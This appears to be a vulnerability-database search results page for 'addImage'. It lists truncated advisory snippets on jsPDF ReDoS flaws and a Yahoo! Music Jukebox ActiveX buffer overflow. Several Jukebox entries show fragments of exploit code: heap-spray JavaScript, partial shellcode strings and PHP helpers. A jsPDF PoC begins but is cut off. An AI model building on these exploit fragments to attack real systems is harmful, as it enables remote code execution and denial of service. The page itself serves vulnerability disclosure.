60 matches found
CVE-2025-29907
jsPDF is a library to generate PDFs in JavaScript. Prior to 3.0.1, user control of the first argument of the addImage method results in CPU utilization and denial of service. If given the possibility to pass unsanitised image urls to the addImage method, a user can provide a harmful data-url that...
jsPDF Bypass Regular Expression Denial of Service (ReDoS)
Impact User control of the first argument of the addImage method results in CPU utilization and denial of service. If given the possibility to pass unsanitized image urls to the addImage method, a user can provide a harmful data-url that results in high CPU utilization and denial of service. Othe...
Regular Expression Denial of Service (ReDoS)
Overview Affected versions of this package are vulnerable to Regular Expression Denial of Service ReDoS in the addImage, html, and addSvgAsImage methods. An attacker can occupy excessive CPU by supplying a malicious data-url. PoC js import jsPDF from "jpsdf" const doc = new jsPDF; const payload =...
GHSA-W532-JXJH-HJHJ jsPDF Bypass Regular Expression Denial of Service (ReDoS)
Impact User control of the first argument of the addImage method results in CPU utilization and denial of service. If given the possibility to pass unsanitized image urls to the addImage method, a user can provide a harmful data-url that results in high CPU utilization and denial of service. Othe...
CVE-2025-29907
jsPDF is a library to generate PDFs in JavaScript. Prior to 3.0.1, user control of the first argument of the addImage method results in CPU utilization and denial of service. If given the possibility to pass unsanitised image urls to the addImage method, a user can provide a harmful data-url that...
Regular Expression Denial of Service (ReDoS)
Overview jspdf before version 2.3.1 has a regular expression denial-of-service via the addImage function. Recommendation Upgrade to version 2.3.1 or later References - CVE - GitHub Advisory...
GHSA-57F3-GGHM-9MHC jspdf vulnerable to Regular Expression Denial of Service (ReDoS)
This affects the package jspdf before 2.3.1. ReDoS is possible via the addImage function...
jspdf vulnerable to Regular Expression Denial of Service (ReDoS)
This affects the package jspdf before 2.3.1. ReDoS is possible via the addImage function...
Regular Expression Denial Of Service (ReDoS)
jspdf is vulnerable to regular expression denial of service. The vulnerability exists because it does not properly handle the regular expression for input image info extractedInfo in the function addImage , causing an application crash...
CVE-2021-23353
This affects the package jspdf before 2.3.1. ReDoS is possible via the addImage function...
CVE-2021-23353
This affects the package jspdf before 2.3.1. ReDoS is possible via the addImage function...
CVE-2021-23353 Regular Expression Denial of Service (ReDoS)
This affects the package jspdf before 2.3.1. ReDoS is possible via the addImage function...
CVE-2021-23353
The CVE-2021-23353 entry concerns jspdf before version 2.3.1, where a Regular Expression Denial of Service (ReDoS) is possible via the addImage function. Multiple sources (NVD, Node.js advisory, GitHub advisory, OSV, Veracode, CVE list) confirm the affected component and the vulnerability class. ...
Stack overflow
Stack-based buffer overflow in the YMP Datagrid ActiveX control datagrid.dll in Yahoo! Music Jukebox 2.2.2.056 allows remote attackers to execute arbitrary code via a long argument to the AddImage method...
yahoomusic-overflow.txt
// HeapSpray - execute calculator calc.exe shellcode = unescape"%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" + "%u4948%u4949%u4949%u4949%u4949%u4949%u5a51%u436a" + "%u3058%u3142%u4250%u6b41%u4142%u4253%u4232%u3241" + "%u4141%u4130%u5841%u3850%u4242%u4875%u6b69%u4d4c" +...
Yahoo! Music Jukebox 2.2 AddImage() ActiveX Remote BOF Exploit (2)
Exploit for unknown platform in category remote exploits ================================================================== Yahoo! Music Jukebox 2.2 AddImage ActiveX Remote BOF Exploit 2 ================================================================== // HeapSpray - execute calculator calc.exe...
Yahoo! Music Jukebox 2.2 - AddImage() ActiveX Remote Buffer Overflow (1)
Yahoo! Music Jukebox 2.2 - AddImage ActiveX Remote Buffer Overflow 1 function unescape$s $res=strtoupperbin2hex$s; $g = roundstrlen$res/4; if $g != strlen$res/4$res.="00"; $out = ""; for $i=0; $i function gsc var hsta = 0x0c0c0c0c; var plc = unescape"%u4343%u4343"+...
Yahoo! Music Jukebox 2.2 AddImage() ActiveX Remote BOF Exploit
No description provided by source. ?php // 0x48k-ymj by ... // based on /5043 // Bug discovered by Krystian Kloskowski h07 [email protected] function unescape$s $res=strtoupperbin2hex$s; $g = roundstrlen$res/4; if $g != strlen$res/4$res.="00"; $out = "";...
Yahoo! Music Jukebox 2.2 - 'AddImage()' ActiveX Remote Buffer Overflow (1)
function unescape$s $res=strtoupperbin2hex$s; $g = roundstrlen$res/4; if $g != strlen$res/4$res.="00"; $out = ""; for $i=0; $i function gsc var hsta = 0x0c0c0c0c; var plc = unescape"%u4343%u4343"+ "%u0feb%u335b%u66c9%u80b9%u8001%uef33"+ "%ue243%uebfa%ue805%uffec%uffff%u8b7f"+...
Yahoo! Music Jukebox 2.2 - 'AddImage()' ActiveX Remote Buffer Overflow (PoC)
Product homepage: http://music.yahoo.com/jukebox/ Tested on:.. - Yahoo! Music Jukebox 2.2.2.056 - MS IE 6 Details:.. ---------------------------------------------------------------- Exception C0000005 ACCESSVIOLATION reading 41414141 ---------------------------------------------------------------...